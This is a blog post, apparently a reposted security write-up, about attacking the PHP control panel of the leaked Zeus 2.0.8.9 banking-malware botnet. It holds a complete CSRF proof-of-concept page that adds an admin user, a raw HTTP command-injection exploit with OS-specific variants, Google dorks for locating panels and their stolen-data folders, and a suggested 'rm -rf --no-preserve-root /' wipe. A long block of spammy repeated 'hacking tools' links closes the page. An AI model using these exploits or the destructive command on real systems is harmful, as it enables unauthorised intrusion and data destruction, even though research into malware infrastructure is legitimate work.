Sondag 28 Mei 2023

Attacking Financial Malware Botnet Panels - Zeus

I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:
  • inurl:cp.php?m=login - this should be the login to the control panel
  • inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
  • inurl:install/index.php - this should be deleted, but I think this is useless now.


Boring vulns found

Update: You can use the CSRF to create a new user with admin privileges:
<html> <head>     <title></title> </head> <body>     <pre>   This is a CSRF POC to create a new admin user in Zeus admin panels.   Username: user_1392719246 Password: admin1   You might change the URL from 127.0.0.1.   Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.   </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>     <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">  <input name="name" type="hidden" value="user_1392719246" />   <input name="password" type="hidden" value="admin1" />   <input name="status" type="hidden" value="1" />   <input name="comment" type="hidden" value="PWND!" />  <input name="r_botnet_bots" type="hidden" value="1" />   <input name="r_botnet_scripts" type="hidden" value="1" />   <input name="r_botnet_scripts_edit" type="hidden" value="1" />   <input name="r_edit_bots" type="hidden" value="1" />   <input name="r_reports_db" type="hidden" value="1" />   <input name="r_reports_db_edit" type="hidden" value="1" />   <input name="r_reports_files" type="hidden" value="1" />  <input name="r_reports_files_edit" type="hidden" value="1" />  <input name="r_reports_jn" type="hidden" value="1" />   <input name="r_stats_main" type="hidden" value="1" />   <input name="r_stats_main_reset" type="hidden" value="1" />   <input name="r_stats_os" type="hidden" value="1" />   <input name="r_system_info" type="hidden" value="1" />   <input name="r_system_options" type="hidden" value="1" />  <input name="r_system_user" type="hidden" value="1" />   <input name="r_system_users" type="hidden" value="1" />     </form> <script type="text/javascript">  window.onload=function(){    var counter = 10;   var interval = setInterval(function() {    counter--;    document.getElementById('countdown').innerHTML = counter;    if (counter == 0) {     redirect();     clearInterval(interval);    }   }, 1000);  };     function redirect() {   document.getElementById("csrf-form").submit();     }     </script> </body> </html>
  • MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
  • ClickJacking - really boring stuff
  • Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
  • SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)


The following stuff looks good, at least some vulns were taken seriously:
  • The system directory is protected with .htaccess deny from all.
  • gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
  • Anti XSS: the following code is used almost everywhere
    • return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');
    My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)


And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){    ...    $archive .= '.zip';    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';    exec($cli, $e, $r); }

The exploit could not be simpler: 
POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60  filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1
because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)

More articles


  1. Hacking Tools For Windows Free Download
  2. Hack Tools For Ubuntu
  3. Hacker Tools Github
  4. Pentest Tools Android
  5. Computer Hacker
  6. Hack Tools Pc
  7. Hack Rom Tools
  8. Bluetooth Hacking Tools Kali
  9. Hackers Toolbox
  10. Pentest Recon Tools
  11. Pentest Tools Kali Linux
  12. Physical Pentest Tools
  13. World No 1 Hacker Software
  14. Hack And Tools
  15. Hacking Tools Usb
  16. Pentest Tools Review
  17. Pentest Reporting Tools
  18. New Hack Tools
  19. Hack Tools Pc
  20. Physical Pentest Tools
  21. Best Hacking Tools 2019
  22. Pentest Tools Free
  23. Hack Tools For Mac
  24. Pentest Tools Review
  25. Pentest Tools Review
  26. Hacking Tools Kit
  27. Hacker Tools Windows
  28. Kik Hack Tools
  29. Pentest Tools Bluekeep
  30. Tools Used For Hacking
  31. Blackhat Hacker Tools
  32. Underground Hacker Sites
  33. Game Hacking
  34. Nsa Hack Tools Download
  35. Hacking Tools And Software
  36. Hacker Tools Hardware
  37. Hacker Tools 2019
  38. Pentest Tools Open Source
  39. Hacking Tools Free Download
  40. Hacker Tools 2020
  41. Pentest Tools Bluekeep
  42. Hack Rom Tools
  43. Hacker Tools Software
  44. Pentest Tools Website
  45. Pentest Tools Free
  46. Hacking Tools Download
  47. Pentest Tools Android
  48. Hack Tools Pc
  49. Hacker Tools Free Download
  50. Hack Tools Pc
  51. Hacking Tools Usb
  52. Install Pentest Tools Ubuntu
  53. Hack Tools For Games
  54. Bluetooth Hacking Tools Kali
  55. Hack App
  56. Hacker
  57. Hacker Tools Software
  58. Free Pentest Tools For Windows
  59. Hacking Tools Name
  60. Hacking Tools Windows
  61. Hacking Tools Pc
  62. Hacker Tools List
  63. Usb Pentest Tools
  64. Hacker Tools For Ios
  65. Pentest Tools Online
  66. Hacking Apps
  67. Pentest Tools Windows
  68. Hack Tools For Pc
  69. Hacker Search Tools
  70. Hacker Tools Free
  71. New Hack Tools
  72. Hack Tool Apk
  73. What Is Hacking Tools
  74. How To Hack
  75. Hacker Hardware Tools
  76. Hacking Tools For Windows
  77. Computer Hacker
  78. Hacking Apps
  79. Pentest Tools Port Scanner
  80. Hacking Apps
  81. Hacking Tools
  82. Hacks And Tools
  83. Growth Hacker Tools
  84. Pentest Tools Port Scanner
  85. Best Pentesting Tools 2018
  86. Termux Hacking Tools 2019
  87. Hacking Tools Github
  88. Hacker Tools For Mac
  89. Hack Tools Mac
  90. Hackers Toolbox
  91. Black Hat Hacker Tools
  92. Kik Hack Tools
  93. Hacking App
  94. Usb Pentest Tools
  95. Hack Tools
  96. Pentest Tools Review
  97. Hacking Tools For Windows 7
  98. Wifi Hacker Tools For Windows
  99. Best Hacking Tools 2019
  100. Hackrf Tools
  101. Hacking Tools Github
  102. Hacking Tools Windows 10
  103. Termux Hacking Tools 2019
  104. Pentest Tools Open Source
  105. Pentest Tools Open Source
  106. Hack Tools Github
  107. Hack Tools Mac
  108. Wifi Hacker Tools For Windows
  109. Hack Tools
  110. Nsa Hacker Tools
  111. Hacking Tools Usb
  112. Nsa Hack Tools
  113. Hacker Tools Free Download
  114. Growth Hacker Tools
  115. Hack Tools Pc
  116. Kik Hack Tools
  117. Hacking Tools Hardware
  118. Hacker Tools For Pc
  119. Pentest Tools Framework
  120. Pentest Tools For Android
  121. Hacker Techniques Tools And Incident Handling
  122. Hacker Tools For Pc
  123. Hacking Tools Hardware
  124. Pentest Tools Alternative
  125. Hacking Tools 2019
  126. Hacking Apps
  127. Hacking Tools Pc
  128. Hacker Tools For Pc
  129. Pentest Tools Port Scanner
  130. Hack Website Online Tool
  131. Hacking Tools For Pc
  132. Ethical Hacker Tools
  133. Pentest Tools For Android
  134. Hacking Tools 2020
  135. Pentest Tools Android
  136. Pentest Box Tools Download
  137. Hacker Tools Apk
  138. Bluetooth Hacking Tools Kali
  139. Hacking Tools 2020
  140. Pentest Tools Framework
  141. Hacking Tools For Windows
  142. Pentest Tools Website Vulnerability
  143. Hacker Tools Free Download
  144. New Hack Tools
  145. How To Install Pentest Tools In Ubuntu
  146. Pentest Tools Android
  147. Hacking Tools For Pc
  148. Best Pentesting Tools 2018
  149. Pentest Tools List
  150. Pentest Tools Framework
  151. Pentest Tools
  152. Hacker Tools List
  153. Pentest Tools Github
  154. Pentest Reporting Tools
  155. Pentest Tools Windows
  156. Nsa Hacker Tools
  157. Black Hat Hacker Tools
  158. Pentest Tools Tcp Port Scanner
  159. Hack App
Geplaas deur om

Geen opmerkings nie:

Plaas 'n opmerking

Teken in op: Plaas opmerkings (Atom)